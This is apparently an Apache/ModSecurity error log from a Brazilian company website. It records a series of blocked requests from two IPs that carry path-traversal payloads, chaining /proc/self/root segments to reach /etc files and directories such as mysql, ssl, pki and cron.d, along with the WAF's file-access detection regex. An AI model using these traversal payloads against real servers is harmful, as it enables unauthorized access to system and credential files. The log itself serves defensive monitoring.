[Fri Mar 20 06:21:08.987002 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:51298] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RhNa6ubjKNq_cu4a_KQAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:10.268333 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.241.31:51300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Rhrninkcc-iUj5ApLFQAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:12.639118 2026] [:error] [pid 11642:tid 140411632822016] [client 74.7.241.31:51314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RiLninkcc-iUj5ApLGQAAA40"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:15.114495 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.241.31:51322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ri_HIg5MgXLBnicPmGwAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:16.424797 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:51332] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RjNa6ubjKNq_cu4a_LQAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:18.552010 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:36414] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Rjta6ubjKNq_cu4a_MAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:21:28.217180 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.241.31:36424] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RmAF0L0L-SsrnPo5UcgAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:22:05.672025 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.241.31:59166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0RveoXxyEfFpUF8f9usgAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:22:37.953109 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.241.31:47202] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0R3fXLqtnMIWvjpaKHEgAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:22:39.271358 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:48940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0R3_qxLDW4GITHUkTSBQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:22:40.630973 2026] [:error] [pid 11642:tid 140411599251200] [client 74.7.241.31:48950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0R4Lninkcc-iUj5ApLZwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:23:08.427151 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.241.31:48966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0R_PqxLDW4GITHUkTSHgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:23:56.895029 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:46818] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SK-oXxyEfFpUF8f9vDAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:23:59.320151 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.241.31:43572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SLxCii7xarUs8iHZVRgAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:24:56.867817 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:38962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/magic"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SaPXLqtnMIWvjpaKHawAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:24:59.292437 2026] [:error] [pid 7235:tid 140411725141760] [client 74.7.243.128:33748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Sa_qxLDW4GITHUkTSYAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:25:00.567073 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.243.128:47602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SbLninkcc-iUj5ApL0QAAA4U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:25:00.836080 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:43584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SbBCii7xarUs8iHZVjwAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:25:59.427191 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:47606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Sp-oXxyEfFpUF8f9vbAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:03.211637 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:53534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SqzJ3M9BSuKP7CAYEtAAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:04.543424 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.243.128:53540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0SrPXLqtnMIWvjpaKHjAAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
